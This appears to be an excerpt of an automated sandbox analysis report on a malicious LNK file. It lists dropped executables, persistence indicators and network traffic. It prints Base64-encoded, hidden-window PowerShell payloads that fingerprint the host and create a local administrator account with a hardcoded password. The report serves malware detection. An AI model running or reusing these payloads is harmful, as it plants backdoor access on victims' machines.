JABtAG8AZABlAGwAIAA9ACAAJABoAGEAcgBkAEQAcgBpAHYAZQAuAE0AbwBkAGUAbAAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwAgAD0AIAAiAFMAZQByAGkAYQBsACAATgB1AG0AYgBlAHIAOgAgACQAcwBlAHIAaQBhAGwATgB1AG0AYgBlAHIALAAgAE0AbwBkAGUAbAA6ACAAJABtAG8AZABlAGwAIgAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAArAD0AIAAkAGQAcgBpAHYAZQBJAG4AZgBvAAoAfQAKACQAYwBvAG0AYgBpAG4AZQBkAEkAbgBmAG8AIAA9ACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAAtAGoAbwBpAG4AIAAiAGAAcgBgAG4AIgAKACQAYwBwAHUASQBuAGYAbwAgAD0AIABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMAIABXAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzAG8AcgAKACQAYwBwAHUARABlAHQAYQBpAGwAcwAgAD0AIAAiAFAAcgBvAGMAZQBzAHMAbwByAEkAZAA6ACAAJAAoACQAYwBwAHUASQBuAGYAbwAuAFAAcgBvAGMAZQBzAHMAbwByAEkAZAApACwAIABOAGEAbQBlADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATgBhAG0AZQApACwAIABNAGEAeABDAGwAbwBjAGsAUwBwAGUAZQBkADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATQBhAHgAQwBsAG8AYwBrAFMAcABlAGUAZAApACwAIABVAG4AaQBxAHUAZQBJAGQAOgAgACQAKAAkAGMAcAB1AEkAbgBmAG8ALgBVAG4AaQBxAHUAZQBJAGQAKQAiAAoAJABhAGwAbABJAG4AZgBvACAAPQAgACIAJABjAG8AbQBiAGkAbgBlAGQASQBuAGYAbwBgAHIAYABuACQAYwBwAHUARABlAHQAYQBpAGwAcwAiAAoAJABtAGQANQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAE0ARAA1AEMAcgB5AHAAdABvAFMAZQByAHYAaQBjAGUAUAByAG8AdgBpAGQAZQByAAoAJABiAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACQAYQBsAGwASQBuAGYAbwApAAoAJABoAGEAcwBoAEIAeQB0AGUAcwAgAD0AIAAkAG0AZAA1AC4AQwBvAG0AcAB1AHQAZQBIAGEAcwBoACgAJABiAHkAdABlAHMAKQAKACQAaABhAHMAaAAgAD0AIABbAEIAaQB0AEMAbwBuAHYAZQByAHQAZQByAF0AOgA6AFQAbwBTAHQAcgBpAG4AZwAoACQAaABhAHMAaABCAHkAdABlAHMAKQAgAC0AcgBlAHAAbABhAGMAZQAgACcALQAnAAoAIAAgACAAIAByAGUAdAB1AHIAbgAgACQAaABhAHMAaAA7AAoAfQAKAGMAZAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAIgA7AAoAJAB0AGUAcwB0ACAAPQAgAEcAZQB0AC0ASQBkAGUAbgB0AGkAdAB5ADsACgAkAHQAZQBzAHQAIAB8ACAATwB1AHQALQBGAGkAbABlACAALQBGAGkAbABlAFAAYQB0AGgAIAAiAGQAZQB2AGkAYwBlAEkAZAAuAHQAeAB0ACIAIAAtAEUAbgBjAG8AZABpAG4AZwAgAFUAVABGADgA
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand JABVAHMAZQByAG4AYQBtAGUAIAA9ACAAIgBVAHMAZQByADEAIgA7ACQAcAB3AGQAIAA9ACAAIgAxADIAMwA0ADUANgA3ADgAOQAhAEEAMQBhACIAOwAgACQAVQBzAGUAcgBQAGEAcgBhAG0AcwAgAD0AIABAAHsAJwBOAGEAbQBlACcAIAA9ACAAJABVAHMAZQByAG4AYQBtAGUAOwAgACcAUABhAHMAcwB3AG8AcgBkACcAIAA9ACAAKABDAG8AbgB2AGUAcgB0AFQAbwAtAFMAZQBjAHUAcgBlAFMAdAByAGkAbgBnACAALQBTAHQAcgBpAG4AZwAgACQAcAB3AGQAIAAtAEEAcwBQAGwAYQBpAG4AVABlAHgAdAAgAC0ARgBvAHIAYwBlACkAOwAgACcAUABhAHMAcwB3AG8AcgBkAE4AZQB2AGUAcgBFAHgAcABpAHIAZQBzACcAIAA9ACAAJAB0AHIAdQBlAH0AOwBOAGUAdwAtAEwAbwBjAGEAbABVAHMAZQByACAAQABVAHMAZQByAFAAYQByAGEAbQBzADsAJABHAHIAbwB1AHAAUABhAHIAYQBtAHMAIAA9ACAAQAB7ACcARwByAG8AdQBwACcAIAA9ACAAJwBBAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByAHMAJwA7ACAAJwBNAGUAbQBiAGUAcgAnACAAPQAgACQAVQBzAGUAcgBuAGEAbQBlAH0AOwBBAGQAZAAtAEwAbwBjAGEAbABHAHIAbwB1AHAATQBlAG0AYgBlAHIAIABAAEcAcgBvAHUAcABQAGEAcgBhAG0AcwA7AA0ACgA=
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZwBlAHQALQBzAGUAcgB2AGkAYwBlACAAIgBtAHkAUgBkAHAAUwBlAHIAdgBpAGMAZQAiAA==
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -w hidden -nologo -nop -ep bypass -EncodedCommand QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7ACAAWwBTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMALgBTAGMAcgBlAGUAbgBdADoAOgBBAGwAbABTAGMAcgBlAGUAbgBzACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIAAiACQAKAAkAF8ALgBCAG8AdQBuAGQAcwAuAFcAaQBkAHQAaAApAHgAJAAoACQAXwAuAEIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQAiACAAfQAgAHwAIABPAHUAdAAtAEYAaQBsAGUAIAAtAEYAaQBsAGUAUABhAHQAaAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAXABkAHAAIgA=

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\40v0i4f3\40v0i4f3.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\40v0i4f3\40v0i4f3.cmdline"			Jump to behavior

Source: svczHost.exe.13.dr	Static PE information: section name: .managed
Source: svczHost.exe.13.dr	Static PE information: section name: hydrated
Source: myRdpService.exe.20.dr	Static PE information: section name: .managed
Source: myRdpService.exe.20.dr	Static PE information: section name: hydrated

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFC7BB5045A push E95CF173h; ret	2_2_00007FFC7BB50459
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFC7BB52310 push eax; iretd	2_2_00007FFC7BB5233D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFC7BB502AD push E95CF173h; ret	2_2_00007FFC7BB50459
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_00007FFC7BB62C62 push eax; iretd	3_2_00007FFC7BB62C61
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_00007FFC7BB62C4D push eax; iretd	3_2_00007FFC7BB62C61
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_00007FFC7BB57C1E push eax; retf	3_2_00007FFC7BB57C2D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_00007FFC7BB5841E push eax; ret	3_2_00007FFC7BB5842D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_00007FFC7BB57BEE pushad ; retf	3_2_00007FFC7BB57C1D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_00007FFC7BB583EE pushad ; ret	3_2_00007FFC7BB5841D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_00007FFC7BB58384 pushad ; ret	3_2_00007FFC7BB5841D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_00007FFC7BB58394 pushad ; ret	3_2_00007FFC7BB5841D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_00007FFC7BB58374 pushad ; ret	3_2_00007FFC7BB5841D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_00007FFC7BB57010 push eax; iretd	3_2_00007FFC7BB57049
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_00007FFC7BB5B771 pushfd ; ret	3_2_00007FFC7BB5B781
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_00007FFC7BC24748 pushad ; iretd	3_2_00007FFC7BC24749
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FFC7BA4D2A5 pushad ; iretd	8_2_00007FFC7BA4D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FFC7BB61FD2 push eax; iretd	8_2_00007FFC7BB62009
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_00007FFC7BA2D2A5 pushad ; iretd	13_2_00007FFC7BA2D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_00007FFC7BC1C420 push ebx; ret	13_2_00007FFC7BC1C421
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_00007FFC7C070940 pushad ; iretd	13_2_00007FFC7C070941
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 28_2_00007FFC7BB77930 push ebx; retf	28_2_00007FFC7BB7794A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 52_2_00007FFC7BB422C5 pushad ; iretd	52_2_00007FFC7BB4232D

Persistence and Installation Behavior

Windows shortcut file (LNK) starts blacklisted processes

Source: LNK file	Process created: C:\Windows\System32\cmd.exe
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file	Process created: C:\Windows\System32\cmd.exe
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file	Process created: C:\Windows\System32\cmd.exe
Source: LNK file	Process created: C:\Windows\System32\cmd.exe
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file	Process created: C:\Windows\System32\cmd.exe
Source: LNK file	Process created: C:\Windows\System32\cmd.exe
Source: LNK file	Process created: C:\Windows\System32\cmd.exe
Source: LNK file	Process created: C:\Windows\System32\cmd.exe
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file	Process created: C:\Windows\System32\cmd.exe
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Jump to behavior
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Jump to behavior
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Jump to behavior
Source: LNK file	Process created: C:\Windows\System32\cmd.exe	Jump to behavior
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file	Process created: C:\Windows\System32\cmd.exe
Source: LNK file	Process created: C:\Windows\System32\cmd.exe
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file	Process created: C:\Windows\System32\cmd.exe
Source: LNK file	Process created: C:\Windows\System32\cmd.exe
Source: LNK file	Process created: C:\Windows\System32\cmd.exe
Source: LNK file	Process created: C:\Windows\System32\cmd.exe
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file	Process created: C:\Windows\System32\cmd.exe
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\40v0i4f3\40v0i4f3.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Windows\Temp\svczHost.exe	Jump to dropped file
Source: C:\Windows\Temp\svczHost.exe	File created: C:\Windows\Temp\myRdpService.exe	Jump to dropped file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Windows\Temp\svczHost.exe			Jump to dropped file
Source: C:\Windows\Temp\svczHost.exe	File created: C:\Windows\Temp\myRdpService.exe			Jump to dropped file

Source: C:\Windows\Temp\myRdpService.exe

Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Application\myRdpService

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\sc.exe sc query myRdpService

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 8000
Source: unknown	Network traffic detected: HTTP traffic on port 8000 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 8000
Source: unknown	Network traffic detected: HTTP traffic on port 8000 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 8000
Source: unknown	Network traffic detected: HTTP traffic on port 8000 -> 49765

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
